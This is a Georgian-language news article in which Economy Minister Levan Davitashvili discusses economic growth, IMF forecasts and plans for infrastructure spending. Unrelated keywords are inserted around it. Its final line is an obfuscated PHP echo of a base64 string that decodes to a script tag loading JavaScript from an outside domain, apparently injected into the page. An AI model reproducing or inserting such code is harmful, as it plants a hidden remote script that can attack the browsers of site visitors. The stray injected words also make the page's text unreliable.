celsiusi
ავერსი შნაიდერი
როდესაც ეკონომიკურ ზრდაზე ვსაუბრობთ, ეს არ არის მხოლოდ ომის ფაქტორით განპირობებული, დიდწილად ეს არის სწორი ეკონომიკური პოლიტიკის შედეგი, რომელსაც ქვეყანა წლების განმავლობაში ატარებს, – განაცხადა ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა საქართველოს პირველი არხის გადაცემაში „თავისუფალი ხედვა“ სტუმრობისას.
მისი თქმით, საერთაშორისო სავალუტო ფონდის შეფასებით, მომდევნო ხუთი წლის განმავლობაში საქართველოს ეკონომიკური ზრდა 4-7%-ის ფარგლებშია, მაგრამ, ამავე პროგნოზით, საქართველო ერთ-ერთი ყველაზე მზარდი ეკონომიკაა რეგიონში და ევროპაში, თუმცა საქართველოსთვის ეს მისაღები არ არის.
„ჩვენ უნდა შევეჩვიოთ ამ სიტყვას, რომ გავხდეთ მდიდარი ქვეყანა. მდიდარი ქვეყანა შეძლებს იმ ამოცანების შესრულებას, რომლებიც აქვს სოციალური, უსაფრთხოების, დემოკრატიის და სხვადასხვა მიმართულებით. ამისთვის, რა თქმა უნდა, საჭიროა, ქვეყანა იყოს ეკონომიკურად უფრო ძლიერი და ამისთვის უფრო მაღალი ეკონომიკური ზრდა გვჭირდება. ეს მარტივად მისაღწევი არ არის, მაგრამ მთავრობამ ყველაფერი უნდა გააკეთოს. სხვადასხვა ინიციატივით უნდა შევძლოთ ეკონომიკის დამატებითი სტიმულირება და ზუსტად ეს გვაქვს გეგმაში. მათ შორის, გაზრდილი ინფრასტრუქტურული დანახარჯებით, ე.წ ფლაგმან, ძალიან მნიშვნელოვან სტრატეგიულ პროექტებზე ფოკუსით ჩვენ უნდა შევძლოთ ეკონომიკის დამატებითი ზრდა“, – განაცხადა დავითაშვილმა.
377
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");